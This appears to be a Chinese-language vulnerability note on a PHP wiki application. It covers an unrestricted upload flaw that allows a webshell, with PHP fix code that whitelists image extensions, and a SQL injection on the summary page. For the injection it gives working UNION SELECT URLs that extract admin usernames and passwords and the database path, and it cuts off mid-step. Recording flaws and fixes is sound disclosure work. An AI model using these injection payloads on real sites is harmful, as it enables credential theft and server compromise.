1、
漏洞:编辑词条,上传图片,服务端未作类型判断,导致直接上传php文件,从而获取webshell。
修复:修改文件wiki/control/attachment.php
// 禁止上传除了jgp、gif、png后缀的其他文件
if ($extname != "jpg" && $extname != "gif" && $extname != "png")
{
$_ENV['attachment']->showmsg($imgname);
exit;
}
2、
漏洞:summary页面注入漏洞
(1)获取admin用户密码(修改groupid为2即可获取另一用户密码)
http://《域名》/wiki/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,concat%28username,0x7c,password%29,7,8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20wiki_user%20where%20groupid=4%23
(2)获取服务器web绝对路径
http://《域名》/wiki/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,@@datadir,7,8,9,0,1,2,3,4,5,6,7,8,9,0%23
(3)写入一